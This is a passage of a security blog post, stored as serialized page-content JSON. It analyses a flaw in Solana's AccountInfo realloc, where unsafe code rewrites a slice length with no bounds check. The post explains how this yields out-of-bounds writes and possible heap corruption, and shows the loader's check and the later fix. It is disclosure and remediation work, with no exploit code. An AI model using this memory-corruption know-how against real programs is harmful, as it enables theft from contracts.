[u8]",{"type":33,"value":16066}," - a ",{"type":28,"tag":2583,"props":16068,"children":16069},{},[16070],{"type":33,"value":16071},"pointer",{"type":33,"value":16073}," to the ",{"type":28,"tag":2583,"props":16075,"children":16076},{},[16077],{"type":33,"value":16078},"slice reference",{"type":33,"value":16080},". From here, we turn the pointer into a ",{"type":28,"tag":98,"props":16082,"children":16084},{"className":16083},[],[16085],{"type":33,"value":16086},"*const u64",{"type":33,"value":16088}," pointer and then offset by 1 ",{"type":28,"tag":98,"props":16090,"children":16092},{"className":16091},[],[16093],{"type":33,"value":7714},{"type":33,"value":16095}," (so 8 bytes). Finally, we switch the pointer back to being mutable, and write the new length to it.",{"type":28,"tag":29,"props":16097,"children":16098},{},[16099,16101,16106,16108,16113,16115,16120,16122,16127,16129,16135],{"type":33,"value":16100},"Now, if you're sitting here thinking that this is unnecessarily convoluted and confusing, you'd be right! But we'll get back to that ",{"type":28,"tag":87,"props":16102,"children":16104},{"href":16103},"#Towards-safer-unsafe",[16105],{"type":33,"value":15773},{"type":33,"value":16107}," too, I promise. In summary, we're writing the new length as a ",{"type":28,"tag":98,"props":16109,"children":16111},{"className":16110},[],[16112],{"type":33,"value":7714},{"type":33,"value":16114}," to the region starting 8 bytes from the start of the slice ",{"type":28,"tag":2583,"props":16116,"children":16117},{},[16118],{"type":33,"value":16119},"reference",{"type":33,"value":16121}," (the ",{"type":28,"tag":98,"props":16123,"children":16125},{"className":16124},[],[16126],{"type":33,"value":15125},{"type":33,"value":16128},").So, what does ",{"type":28,"tag":98,"props":16130,"children":16132},{"className":16131},[],[16133],{"type":33,"value":16134},"&[T]",{"type":33,"value":16136}," look like in Rust?",{"type":28,"tag":29,"props":16138,"children":16139},{},[16140,16142,16149,16151,16164,16166,16172],{"type":33,"value":16141},"According to ",{"type":28,"tag":87,"props":16143,"children":16146},{"href":16144,"rel":16145},"https://doc.rust-lang.org/reference/type-layout.html#pointers-and-references-layout",[91],[16147],{"type":33,"value":16148},"the reference",{"type":33,"value":16150},", it's completely undefined - there are no guarantees made in the reference, and ",{"type":28,"tag":87,"props":16152,"children":16155},{"href":16153,"rel":16154},"https://doc.rust-lang.org/reference/type-layout.html",[91],[16156,16158,16162],{"type":33,"value":16157},"\"Type layout can be changed with each compilation. ",{"type":28,"tag":116,"props":16159,"children":16160},{},[16161],{"type":33,"value":9259},{"type":33,"value":16163}," we only document what is guaranteed today\"",{"type":33,"value":16165},". But it seems like those pesky language specs aren't stopping Solana developers. In current ",{"type":28,"tag":98,"props":16167,"children":16169},{"className":16168},[],[16170],{"type":33,"value":16171},"rustc",{"type":33,"value":16173},", the layout is a data pointer followed by the size; essentially the same as:",{"type":28,"tag":234,"props":16175,"children":16178},{"className":16176,"code":16177,"language":1797,"meta":7,"style":7},"language-c shiki shiki-themes slack-dark","// C language\nstruct slice_ref {\n    void* ptr;\n    size_t len;\n};\n",[16179],{"type":28,"tag":98,"props":16180,"children":16181},{"__ignoreMap":7},[16182,16190,16202,16219,16232],{"type":28,"tag":116,"props":16183,"children":16184},{"class":245,"line":246},[16185],{"type":28,"tag":116,"props":16186,"children":16187},{"style":250},[16188],{"type":33,"value":16189},"// C language\n",{"type":28,"tag":116,"props":16191,"children":16192},{"class":245,"line":256},[16193,16197],{"type":28,"tag":116,"props":16194,"children":16195},{"style":376},[16196],{"type":33,"value":9069},{"type":28,"tag":116,"props":16198,"children":16199},{"style":266},[16200],{"type":33,"value":16201}," slice_ref {\n",{"type":28,"tag":116,"props":16203,"children":16204},{"class":245,"line":293},[16205,16210,16214],{"type":28,"tag":116,"props":16206,"children":16207},{"style":376},[16208],{"type":33,"value":16209},"    void",{"type":28,"tag":116,"props":16211,"children":16212},{"style":370},[16213],{"type":33,"value":4240},{"type":28,"tag":116,"props":16215,"children":16216},{"style":266},[16217],{"type":33,"value":16218}," ptr;\n",{"type":28,"tag":116,"props":16220,"children":16221},{"class":245,"line":361},[16222,16227],{"type":28,"tag":116,"props":16223,"children":16224},{"style":376},[16225],{"type":33,"value":16226},"    size_t",{"type":28,"tag":116,"props":16228,"children":16229},{"style":266},[16230],{"type":33,"value":16231}," len;\n",{"type":28,"tag":116,"props":16233,"children":16234},{"class":245,"line":387},[16235],{"type":28,"tag":116,"props":16236,"children":16237},{"style":266},[16238],{"type":33,"value":16239},"};\n",{"type":28,"tag":29,"props":16241,"children":16242},{},[16243],{"type":33,"value":16244},"So at the end of the day we find out that the code is simply writing over the length field in the slice reference. Let's step back a moment and take a look at all the assumptions we made along the way while executing these 2 lines (really only one of importance!):",{"type":28,"tag":455,"props":16246,"children":16247},{},[16248,16253,16271],{"type":28,"tag":459,"props":16249,"children":16250},{},[16251],{"type":33,"value":16252},"Slices are laid out in the precise manner described",{"type":28,"tag":459,"props":16254,"children":16255},{},[16256,16258,16264,16266],{"type":33,"value":16257},"Pointers and ",{"type":28,"tag":98,"props":16259,"children":16261},{"className":16260},[],[16262],{"type":33,"value":16263},"usize",{"type":33,"value":16265}," are the same width as ",{"type":28,"tag":98,"props":16267,"children":16269},{"className":16268},[],[16270],{"type":33,"value":7714},{"type":28,"tag":459,"props":16272,"children":16273},{},[16274,16276,16281],{"type":33,"value":16275},"The ",{"type":28,"tag":98,"props":16277,"children":16279},{"className":16278},[],[16280],{"type":33,"value":15166},{"type":33,"value":16282}," was not borrowed (i.e. we didn't just mutate it while someone else has a reference to its contents)",{"type":28,"tag":29,"props":16284,"children":16285},{},[16286,16288,16293,16295,16301,16303,16308,16310,16316,16318,16323,16325,16335],{"type":33,"value":16287},"Assumption #2 is ",{"type":28,"tag":2583,"props":16289,"children":16290},{},[16291],{"type":33,"value":16292},"probably",{"type":33,"value":16294}," fine when we only care about targeting Solana's bytecode machine, but still not a particularly safe assumption to make in case some change happens on the toolchain. And assumption #3 turns out to be a non-issue since we had just done a ",{"type":28,"tag":98,"props":16296,"children":16298},{"className":16297},[],[16299],{"type":33,"value":16300},"borrow_mut",{"type":33,"value":16302}," of the ",{"type":28,"tag":98,"props":16304,"children":16306},{"className":16305},[],[16307],{"type":33,"value":15166},{"type":33,"value":16309}," (through ",{"type":28,"tag":98,"props":16311,"children":16313},{"className":16312},[],[16314],{"type":33,"value":16315},"AccountInfo::try_borrow_mut_data()",{"type":33,"value":16317},"), and ",{"type":28,"tag":98,"props":16319,"children":16321},{"className":16320},[],[16322],{"type":33,"value":15166},{"type":33,"value":16324}," is not usable between multiple threads",{"type":28,"tag":15136,"props":16326,"children":16327},{},[16328],{"type":28,"tag":87,"props":16329,"children":16333},{"href":16330,"ariaDescribedBy":16331,"dataFootnoteRef":7,"id":16332},"#user-content-fn-sendsync",[15143],"user-content-fnref-sendsync",[16334],{"type":33,"value":2794},{"type":33,"value":16336},", so we already have exclusive access.",{"type":28,"tag":29,"props":16338,"children":16339},{},[16340,16342,16346],{"type":33,"value":16341},"A few more ",{"type":28,"tag":2583,"props":16343,"children":16344},{},[16345],{"type":33,"value":6779},{"type":33,"value":16347}," things of note, that could have gone badly but didn't:",{"type":28,"tag":2108,"props":16349,"children":16350},{},[16351,16393],{"type":28,"tag":459,"props":16352,"children":16353},{},[16354,16356,16362,16364,16369,16371,16376,16378,16383,16385,16391],{"type":33,"value":16355},"By reborrowing the pointer (the ",{"type":28,"tag":98,"props":16357,"children":16359},{"className":16358},[],[16360],{"type":33,"value":16361},"&mut *(\u003Cvalue of type *mut u64>)",{"type":33,"value":16363},"), we've created a reference with an ",{"type":28,"tag":2583,"props":16365,"children":16366},{},[16367],{"type":33,"value":16368},"unbounded lifetime",{"type":33,"value":16370},". Rust is free to infer ",{"type":28,"tag":2583,"props":16372,"children":16373},{},[16374],{"type":33,"value":16375},"any",{"type":33,"value":16377}," lifetime for ",{"type":28,"tag":98,"props":16379,"children":16381},{"className":16380},[],[16382],{"type":33,"value":13615},{"type":33,"value":16384}," (including ",{"type":28,"tag":98,"props":16386,"children":16388},{"className":16387},[],[16389],{"type":33,"value":16390},"'static",{"type":33,"value":16392},"); thankfully it's only used in the next statement and never has a chance to escape.",{"type":28,"tag":459,"props":16394,"children":16395},{},[16396,16398,16404,16406,16411,16413,16418,16420,16425,16427,16432,16434,16439,16441,16446,16448,16454,16456,16461,16463,16468,16470,16475,16477,16482,16484,16489],{"type":33,"value":16397},"Going back to the first statement when we were modifying the data buffer, it turns out we have another lifetime problem: we created a mutable pointer to the data from the ",{"type":28,"tag":98,"props":16399,"children":16401},{"className":16400},[],[16402],{"type":33,"value":16403},"RefMut",{"type":33,"value":16405}," returned from ",{"type":28,"tag":98,"props":16407,"children":16409},{"className":16408},[],[16410],{"type":33,"value":13540},{"type":33,"value":16412},", but the ",{"type":28,"tag":98,"props":16414,"children":16416},{"className":16415},[],[16417],{"type":33,"value":16403},{"type":33,"value":16419}," is dropped at the end of the statement. So, we now have in ",{"type":28,"tag":98,"props":16421,"children":16423},{"className":16422},[],[16424],{"type":33,"value":13615},{"type":33,"value":16426}," a ",{"type":28,"tag":2583,"props":16428,"children":16429},{},[16430],{"type":33,"value":16431},"mutable",{"type":33,"value":16433}," pointer to the ",{"type":28,"tag":98,"props":16435,"children":16437},{"className":16436},[],[16438],{"type":33,"value":15166},{"type":33,"value":16440},"'s data, but the ",{"type":28,"tag":98,"props":16442,"children":16444},{"className":16443},[],[16445],{"type":33,"value":15166},{"type":33,"value":16447}," thinks that we're done with our borrow. If we happened to be in a multithreaded scenario with something like a ",{"type":28,"tag":98,"props":16449,"children":16451},{"className":16450},[],[16452],{"type":33,"value":16453},"Mutex",{"type":33,"value":16455}," instead of a ",{"type":28,"tag":98,"props":16457,"children":16459},{"className":16458},[],[16460],{"type":33,"value":15166},{"type":33,"value":16462}," (but with otherwise semantically identical code), then a different thread could attempt to borrow between creating ",{"type":28,"tag":98,"props":16464,"children":16466},{"className":16465},[],[16467],{"type":33,"value":13615},{"type":33,"value":16469}," and writing to it ",{"type":28,"tag":2583,"props":16471,"children":16472},{},[16473],{"type":33,"value":16474},"and succeed",{"type":33,"value":16476},", resulting in us writing while another reference is alive. However, since ",{"type":28,"tag":98,"props":16478,"children":16480},{"className":16479},[],[16481],{"type":33,"value":13615},{"type":33,"value":16483}," is behind the actual data and thus the region it points to is inaccessible through the ",{"type":28,"tag":98,"props":16485,"children":16487},{"className":16486},[],[16488],{"type":33,"value":3372},{"type":33,"value":16490}," slice, this is still not a problem. I just wanted to highlight how easy it is to mess up borrowing and lifetimes when writing unsafe code.",{"type":28,"tag":29,"props":16492,"children":16493},{},[16494,16496,16501],{"type":33,"value":16495},"Ok, now that we've understood what the code is ",{"type":28,"tag":2583,"props":16497,"children":16498},{},[16499],{"type":33,"value":16500},"trying",{"type":33,"value":16502}," to do, let's try to break it, shall we?",{"type":28,"tag":63,"props":16504,"children":16506},{"id":16505},"what-can-go-wrong",[16507],{"type":33,"value":16508},"What can go wrong?",{"type":28,"tag":75,"props":16510,"children":16512},{"id":16511},"contracts",[16513],{"type":33,"value":16514},"Contracts",{"type":28,"tag":29,"props":16516,"children":16517},{},[16518,16520,16525,16527,16532,16534,16539,16541,16546],{"type":33,"value":16519},"Again, it's quite conspicuous that there's no bounds check whatsoever, and additionally, we notice that at no point did we actually touch the data pointer of the slice reference when ",{"type":28,"tag":98,"props":16521,"children":16523},{"className":16522},[],[16524],{"type":33,"value":13304},{"type":33,"value":16526},"'ing. In other words, when we realloc, all we do is change some size fields, no allocation is happening. So, if we ",{"type":28,"tag":98,"props":16528,"children":16530},{"className":16529},[],[16531],{"type":33,"value":13304},{"type":33,"value":16533}," to some large size, past the end of the buffer of roughly ",{"type":28,"tag":98,"props":16535,"children":16537},{"className":16536},[],[16538],{"type":33,"value":14956},{"type":33,"value":16540}," bytes in the serialized buffer from the BPF loader, then we've got free out-of-bounds memory write! Using the ",{"type":28,"tag":98,"props":16542,"children":16544},{"className":16543},[],[16545],{"type":33,"value":3372},{"type":33,"value":16547}," slice, we can write to anything \"after\" our account's data in memory. Other accounts' data are stored adjacent in memory, so it'd be pretty easy to modify the data or lamports. And remember, sizes and indices are unsigned, so what's \"behind\" our account in memory is actually just very far \"after\" our account - the address will wrap around the end of the address space.",{"type":28,"tag":29,"props":16549,"children":16550},{},[16551,16553,16560],{"type":33,"value":16552},"There is ",{"type":28,"tag":87,"props":16554,"children":16557},{"href":16555,"rel":16556},"https://github.com/solana-labs/solana/blob/94685e1222b3289859a447d62fadea20898241e0/programs/bpf_loader/src/serialization.rs#L324-L328",[91],[16558],{"type":33,"value":16559},"a check",{"type":33,"value":16561}," by the BPF loader, however, and it boils down to:",{"type":28,"tag":234,"props":16563,"children":16565},{"className":2652,"code":16564,"language":2651,"meta":7,"style":7},"if post_len.saturating_sub(*pre_len) > MAX_PERMITTED_DATA_INCREASE\n    || post_len > MAX_PERMITTED_DATA_LENGTH as usize\n{\n    return Err(InstructionError::InvalidRealloc);\n}\n",[16566],{"type":28,"tag":98,"props":16567,"children":16568},{"__ignoreMap":7},[16569,16607,16637,16644,16676],{"type":28,"tag":116,"props":16570,"children":16571},{"class":245,"line":246},[16572,16576,16581,16585,16589,16593,16597,16602],{"type":28,"tag":116,"props":16573,"children":16574},{"style":260},[16575],{"type":33,"value":263},{"type":28,"tag":116,"props":16577,"children":16578},{"style":272},[16579],{"type":33,"value":16580}," post_len",{"type":28,"tag":116,"props":16582,"children":16583},{"style":370},[16584],{"type":33,"value":141},{"type":28,"tag":116,"props":16586,"children":16587},{"style":282},[16588],{"type":33,"value":13958},{"type":28,"tag":116,"props":16590,"children":16591},{"style":266},[16592],{"type":33,"value":313},{"type":28,"tag":116,"props":16594,"children":16595},{"style":370},[16596],{"type":33,"value":4240},{"type":28,"tag":116,"props":16598,"children":16599},{"style":272},[16600],{"type":33,"value":16601},"pre_len",{"type":28,"tag":116,"props":16603,"children":16604},{"style":266},[16605],{"type":33,"value":16606},") > MAX_PERMITTED_DATA_INCREASE\n",{"type":28,"tag":116,"props":16608,"children":16609},{"class":245,"line":256},[16610,16615,16619,16623,16628,16632],{"type":28,"tag":116,"props":16611,"children":16612},{"style":370},[16613],{"type":33,"value":16614},"    ||",{"type":28,"tag":116,"props":16616,"children":16617},{"style":272},[16618],{"type":33,"value":16580},{"type":28,"tag":116,"props":16620,"children":16621},{"style":370},[16622],{"type":33,"value":13860},{"type":28,"tag":116,"props":16624,"children":16625},{"style":266},[16626],{"type":33,"value":16627}," MAX_PERMITTED_DATA_LENGTH ",{"type":28,"tag":116,"props":16629,"children":16630},{"style":376},[16631],{"type":33,"value":8513},{"type":28,"tag":116,"props":16633,"children":16634},{"style":339},[16635],{"type":33,"value":16636}," usize\n",{"type":28,"tag":116,"props":16638,"children":16639},{"class":245,"line":293},[16640],{"type":28,"tag":116,"props":16641,"children":16642},{"style":266},[16643],{"type":33,"value":10547},{"type":28,"tag":116,"props":16645,"children":16646},{"class":245,"line":361},[16647,16651,16655,16659,16663,16667,16672],{"type":28,"tag":116,"props":16648,"children":16649},{"style":260},[16650],{"type":33,"value":393},{"type":28,"tag":116,"props":16652,"children":16653},{"style":339},[16654],{"type":33,"value":15410},{"type":28,"tag":116,"props":16656,"children":16657},{"style":266},[16658],{"type":33,"value":313},{"type":28,"tag":116,"props":16660,"children":16661},{"style":339},[16662],{"type":33,"value":15419},{"type":28,"tag":116,"props":16664,"children":16665},{"style":370},[16666],{"type":33,"value":3151},{"type":28,"tag":116,"props":16668,"children":16669},{"style":339},[16670],{"type":33,"value":16671},"InvalidRealloc",{"type":28,"tag":116,"props":16673,"children":16674},{"style":266},[16675],{"type":33,"value":895},{"type":28,"tag":116,"props":16677,"children":16678},{"class":245,"line":387},[16679],{"type":28,"tag":116,"props":16680,"children":16681},{"style":266},[16682],{"type":33,"value":406},{"type":28,"tag":29,"props":16684,"children":16685},{},[16686,16688,16693,16695,16700],{"type":33,"value":16687},"But, like the other checks performed by the loader, this check only runs after the contract ",{"type":28,"tag":2583,"props":16689,"children":16690},{},[16691],{"type":33,"value":16692},"finishes",{"type":33,"value":16694}," execution. ",{"type":28,"tag":2583,"props":16696,"children":16697},{},[16698],{"type":33,"value":16699},"During",{"type":33,"value":16701}," execution, the contract is free to make whatever modifications to memory that it wants, since Solana's eBPF machine doesn't hook memory accesses in any way.",{"type":28,"tag":29,"props":16703,"children":16704},{},[16705,16707,16712,16714,16719,16721,16728],{"type":33,"value":16706},"The end result is that in order to successfully exploit this bug, an attacker needs a way to change the length back to something valid before the program exits. However, with potentially ",{"type":28,"tag":2583,"props":16708,"children":16709},{},[16710],{"type":33,"value":16711},"arbitrary",{"type":33,"value":16713}," memory access through a mistakenly-",{"type":28,"tag":98,"props":16715,"children":16717},{"className":16716},[],[16718],{"type":33,"value":13304},{"type":33,"value":16720},"'d account, this falls in the relm of some ",{"type":28,"tag":87,"props":16722,"children":16725},{"href":16723,"rel":16724},"https://en.wikipedia.org/wiki/Buffer_overflow",[91],[16726],{"type":33,"value":16727},"old-school pwning",{"type":33,"value":16729}," - even if we can't use the out-of-bounds access directly, there's plenty of pointers in memory that could be of use.",{"type":28,"tag":75,"props":16731,"children":16733},{"id":16732},"not-contracts",[16734],{"type":33,"value":16735},"Not-contracts?",{"type":28,"tag":29,"props":16737,"children":16738},{},[16739,16741,16746,16748,16758,16760,16772,16774,16781,16783,16788,16790,16795,16797,16810,16812,16817,16819,16824],{"type":33,"value":16740},"Remember when we said that all this code makes sense ",{"type":28,"tag":2583,"props":16742,"children":16743},{},[16744],{"type":33,"value":16745},"if the data points to the BPF loader's serialized buffer",{"type":33,"value":16747},"? Well unfortunately for us, there's nothing enforcing that; all the fields on ",{"type":28,"tag":87,"props":16749,"children":16752},{"href":16750,"rel":16751},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html",[91],[16753],{"type":28,"tag":98,"props":16754,"children":16756},{"className":16755},[],[16757],{"type":33,"value":14602},{"type":33,"value":16759}," are public, and so is its ",{"type":28,"tag":87,"props":16761,"children":16764},{"href":16762,"rel":16763},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html#method.new",[91],[16765,16770],{"type":28,"tag":98,"props":16766,"children":16768},{"className":16767},[],[16769],{"type":33,"value":336},{"type":33,"value":16771}," method",{"type":33,"value":16773}," (which is ",{"type":28,"tag":87,"props":16775,"children":16778},{"href":16776,"rel":16777},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#160-180",[91],[16779],{"type":33,"value":16780},"nothing more than a thin wrapper around just creating the struct literal yourself",{"type":33,"value":16782},"). The ",{"type":28,"tag":98,"props":16784,"children":16786},{"className":16785},[],[16787],{"type":33,"value":13304},{"type":33,"value":16789}," code critically assumes that the memory 8 bytes behind the data buffer is the data's length and that we can write to it however we want when realloc'ing. So, clearly if we were to create an ",{"type":28,"tag":98,"props":16791,"children":16793},{"className":16792},[],[16794],{"type":33,"value":14602},{"type":33,"value":16796}," ourselves - potentially through the ",{"type":28,"tag":87,"props":16798,"children":16801},{"href":16799,"rel":16800},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/trait.Account.html",[91],[16802,16808],{"type":28,"tag":98,"props":16803,"children":16805},{"className":16804},[],[16806],{"type":33,"value":16807},"Account",{"type":33,"value":16809}," trait",{"type":33,"value":16811},", which is hardly documented at all and makes ",{"type":28,"tag":2583,"props":16813,"children":16814},{},[16815],{"type":33,"value":16816},"no",{"type":33,"value":16818}," mention of any prerequisites about the nature of the references that need to be returned - we'd run in to problems from pretty much any practical way we'd allocate the ",{"type":28,"tag":98,"props":16820,"children":16822},{"className":16821},[],[16823],{"type":33,"value":3372},{"type":33,"value":16825}," buffer.",{"type":28,"tag":29,"props":16827,"children":16828},{},[16829,16831,16842,16844,16850,16852,16858,16860,16873,16875,16880,16882,16887,16889,16894,16896,16901,16903,16908,16910,16915],{"type":33,"value":16830},"One long arm of this is ",{"type":28,"tag":87,"props":16832,"children":16835},{"href":16833,"rel":16834},"https://docs.rs/solana-sdk/1.10.28/solana_sdk/account/struct.Account.html",[91],[16836],{"type":28,"tag":98,"props":16837,"children":16839},{"className":16838},[],[16840],{"type":33,"value":16841},"solana_sdk::account::Account",{"type":33,"value":16843}," - in the client SDK. It holds an account's data in a ",{"type":28,"tag":98,"props":16845,"children":16847},{"className":16846},[],[16848],{"type":33,"value":16849},"Vec\u003Cu8>",{"type":33,"value":16851},", and it implements ",{"type":28,"tag":98,"props":16853,"children":16855},{"className":16854},[],[16856],{"type":33,"value":16857},"solana_program::account_info::Account",{"type":33,"value":16859}," (the trait from earlier) - by ",{"type":28,"tag":87,"props":16861,"children":16864},{"href":16862,"rel":16863},"https://docs.rs/solana-sdk/1.10.28/src/solana_sdk/account.rs.html#661-669",[91],[16865,16867],{"type":33,"value":16866},"returning a reference to the contents of that ",{"type":28,"tag":98,"props":16868,"children":16870},{"className":16869},[],[16871],{"type":33,"value":16872},"Vec",{"type":33,"value":16874},". So, ",{"type":28,"tag":98,"props":16876,"children":16878},{"className":16877},[],[16879],{"type":33,"value":13304},{"type":33,"value":16881}," writes the size into the 8 bytes right before ",{"type":28,"tag":98,"props":16883,"children":16885},{"className":16884},[],[16886],{"type":33,"value":3372},{"type":33,"value":16888},"; ",{"type":28,"tag":98,"props":16890,"children":16892},{"className":16891},[],[16893],{"type":33,"value":3372},{"type":33,"value":16895}," is the buffer of a ",{"type":28,"tag":98,"props":16897,"children":16899},{"className":16898},[],[16900],{"type":33,"value":16872},{"type":33,"value":16902},", and so it is the contents of a heap allocation; and, immediately before a heap allocation sits critical metadata. The result? If, for some reason, you construct an ",{"type":28,"tag":98,"props":16904,"children":16906},{"className":16905},[],[16907],{"type":33,"value":14602},{"type":33,"value":16909}," out of an SDK ",{"type":28,"tag":98,"props":16911,"children":16913},{"className":16912},[],[16914],{"type":33,"value":16807},{"type":33,"value":16916}," and then realloc it (which admittedly is quite a stretch), then you get heap corruption - something that's very likely to lead to remote code execution.",{"type":28,"tag":63,"props":16918,"children":16920},{"id":16919},"remediation",[16921],{"type":33,"value":16922},"Remediation",{"type":28,"tag":29,"props":16924,"children":16925},{},[16926],{"type":33,"value":16927},"Obviously the fix for the main issue at hand is to check that the resize operation remains in-bounds. But how do we know how big is too big?",{"type":28,"tag":29,"props":16929,"children":16930},{},[16931,16933,16938,16940,16945,16947,16958,16960,16965,16967,16974],{"type":33,"value":16932},"The sensible thing to do would be to store the initial size in the ",{"type":28,"tag":98,"props":16934,"children":16936},{"className":16935},[],[16937],{"type":33,"value":14602},{"type":33,"value":16939},"... except for the fact that the layout of ",{"type":28,"tag":98,"props":16941,"children":16943},{"className":16942},[],[16944],{"type":33,"value":14602},{"type":33,"value":16946}," is actually part of the ABI between the contract runtime and the loader :face_palm:",{"type":28,"tag":15136,"props":16948,"children":16949},{},[16950],{"type":28,"tag":87,"props":16951,"children":16955},{"href":16952,"ariaDescribedBy":16953,"dataFootnoteRef":7,"id":16954},"#user-content-fn-layout",[15143],"user-content-fnref-layout",[16956],{"type":33,"value":16957},"3",{"type":33,"value":16959}," So, with changing ",{"type":28,"tag":98,"props":16961,"children":16963},{"className":16962},[],[16964],{"type":33,"value":14602},{"type":33,"value":16966}," out of the question, the Solana team came up with a different place to stash the information: inside a section of padding in the serialized buffer passed from the runtime. This happened to be next to where the pubkey was stored, which resulted in the creation of ",{"type":28,"tag":87,"props":16968,"children":16971},{"href":16969,"rel":16970},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#74-85",[91],[16972],{"type":33,"value":16973},"this function",{"type":33,"value":4160},{"type":28,"tag":234,"props":16976,"children":16978},{"className":2652,"code":16977,"language":2651,"meta":7,"style":7},"/// Return the account's original data length when it was serialized for the\n/// current program invocation.\n///\n/// # Safety\n///\n/// This method assumes that the original data length was serialized as a u32\n/// integer in the 4 bytes immediately preceding the serialized account key.\npub unsafe fn original_data_len(&self) -> usize {\n    let key_ptr = self.key as *const _ as *const u8;\n    let original_data_len_ptr = key_ptr.offset(-4) as *const u32;\n    *original_data_len_ptr as usize\n}\n",[16979],{"type":28,"tag":98,"props":16980,"children":16981},{"__ignoreMap":7},[16982,16990,16998,17006,17014,17021,17029,17037,17085,17150,17216,17237],{"type":28,"tag":116,"props":16983,"children":16984},{"class":245,"line":246},[16985],{"type":28,"tag":116,"props":16986,"children":16987},{"style":250},[16988],{"type":33,"value":16989},"/// Return the account's original data length when it was serialized for the\n",{"type":28,"tag":116,"props":16991,"children":16992},{"class":245,"line":256},[16993],{"type":28,"tag":116,"props":16994,"children":16995},{"style":250},[16996],{"type":33,"value":16997},"/// current program invocation.\n",{"type":28,"tag":116,"props":16999,"children":17000},{"class":245,"line":293},[17001],{"type":28,"tag":116,"props":17002,"children":17003},{"style":250},[17004],{"type":33,"value":17005},"///\n",{"type":28,"tag":116,"props":17007,"children":17008},{"class":245,"line":361},[17009],{"type":28,"tag":116,"props":17010,"children":17011},{"style":250},[17012],{"type":33,"value":17013},"/// # Safety\n",{"type":28,"tag":116,"props":17015,"children":17016},{"class":245,"line":387},[17017],{"type":28,"tag":116,"props":17018,"children":17019},{"style":250},[17020],{"type":33,"value":17005},{"type":28,"tag":116,"props":17022,"children":17023},{"class":245,"line":400},[17024],{"type":28,"tag":116,"props":17025,"children":17026},{"style":250},[17027],{"type":33,"value":17028},"/// This method assumes that the original data length was serialized as a u32\n",{"type":28,"tag":116,"props":17030,"children":17031},{"class":245,"line":614},[17032],{"type":28,"tag":116,"props":17033,"children":17034},{"style":250},[17035],{"type":33,"value":17036},"/// integer in the 4 bytes immediately preceding the serialized account key.\n",{"type":28,"tag":116,"props":17038,"children":17039},{"class":245,"line":631},[17040,17044,17048,17052,17057,17061,17065,17069,17073,17077,17081],{"type":28,"tag":116,"props":17041,"children":17042},{"style":376},[17043],{"type":33,"value":13356},{"type":28,"tag":116,"props":17045,"children":17046},{"style":376},[17047],{"type":33,"value":14256},{"type":28,"tag":116,"props":17049,"children":17050},{"style":376},[17051],{"type":33,"value":13361},{"type":28,"tag":116,"props":17053,"children":17054},{"style":282},[17055],{"type":33,"value":17056}," original_data_len",{"type":28,"tag":116,"props":17058,"children":17059},{"style":266},[17060],{"type":33,"value":313},{"type":28,"tag":116,"props":17062,"children":17063},{"style":370},[17064],{"type":33,"value":2780},{"type":28,"tag":116,"props":17066,"children":17067},{"style":376},[17068],{"type":33,"value":13379},{"type":28,"tag":116,"props":17070,"children":17071},{"style":266},[17072],{"type":33,"value":1609},{"type":28,"tag":116,"props":17074,"children":17075},{"style":370},[17076],{"type":33,"value":13423},{"type":28,"tag":116,"props":17078,"children":17079},{"style":339},[17080],{"type":33,"value":13397},{"type":28,"tag":116,"props":17082,"children":17083},{"style":266},[17084],{"type":33,"value":1291},{"type":28,"tag":116,"props":17086,"children":17087},{"class":245,"line":665},[17088,17092,17097,17101,17105,17109,17114,17118,17122,17126,17130,17134,17138,17142,17146],{"type":28,"tag":116,"props":17089,"children":17090},{"style":376},[17091],{"type":33,"value":2672},{"type":28,"tag":116,"props":17093,"children":17094},{"style":272},[17095],{"type":33,"value":17096}," key_ptr",{"type":28,"tag":116,"props":17098,"children":17099},{"style":370},[17100],{"type":33,"value":2226},{"type":28,"tag":116,"props":17102,"children":17103},{"style":376},[17104],{"type":33,"value":13463},{"type":28,"tag":116,"props":17106,"children":17107},{"style":370},[17108],{"type":33,"value":141},{"type":28,"tag":116,"props":17110,"children":17111},{"style":266},[17112],{"type":33,"value":17113},"key ",{"type":28,"tag":116,"props":17115,"children":17116},{"style":376},[17117],{"type":33,"value":8513},{"type":28,"tag":116,"props":17119,"children":17120},{"style":370},[17121],{"type":33,"value":9484},{"type":28,"tag":116,"props":17123,"children":17124},{"style":376},[17125],{"type":33,"value":9323},{"type":28,"tag":116,"props":17127,"children":17128},{"style":272},[17129],{"type":33,"value":2708},{"type":28,"tag":116,"props":17131,"children":17132},{"style":376},[17133],{"type":33,"value":8500},{"type":28,"tag":116,"props":17135,"children":17136},{"style":370},[17137],{"type":33,"value":9484},{"type":28,"tag":116,"props":17139,"children":17140},{"style":376},[17141],{"type":33,"value":9323},{"type":28,"tag":116,"props":17143,"children":17144},{"style":339},[17145],{"type":33,"value":14300},{"type":28,"tag":116,"props":17147,"children":17148},{"style":266},[17149],{"type":33,"value":384},{"type":28,"tag":116,"props":17151,"children":17152},{"class":245,"line":713},[17153,17157,17162,17166,17170,17174,17178,17182,17186,17191,17195,17199,17203,17207,17212],{"type":28,"tag":116,"props":17154,"children":17155},{"style":376},[17156],{"type":33,"value":2672},{"type":28,"tag":116,"props":17158,"children":17159},{"style":272},[17160],{"type":33,"value":17161}," original_data_len_ptr",{"type":28,"tag":116,"props":17163,"children":17164},{"style":370},[17165],{"type":33,"value":2226},{"type":28,"tag":116,"props":17167,"children":17168},{"style":272},[17169],{"type":33,"value":17096},{"type":28,"tag":116,"props":17171,"children":17172},{"style":370},[17173],{"type":33,"value":141},{"type":28,"tag":116,"props":17175,"children":17176},{"style":282},[17177],{"type":33,"value":13567},{"type":28,"tag":116,"props":17179,"children":17180},{"style":266},[17181],{"type":33,"value":313},{"type":28,"tag":116,"props":17183,"children":17184},{"style":370},[17185],{"type":33,"value":3996},{"type":28,"tag":116,"props":17187,"children":17188},{"style":350},[17189],{"type":33,"value":17190},"4",{"type":28,"tag":116,"props":17192,"children":17193},{"style":266},[17194],{"type":33,"value":1609},{"type":28,"tag":116,"props":17196,"children":17197},{"style":376},[17198],{"type":33,"value":8513},{"type":28,"tag":116,"props":17200,"children":17201},{"style":370},[17202],{"type":33,"value":9484},{"type":28,"tag":116,"props":17204,"children":17205},{"style":376},[17206],{"type":33,"value":9323},{"type":28,"tag":116,"props":17208,"children":17209},{"style":339},[17210],{"type":33,"value":17211}," 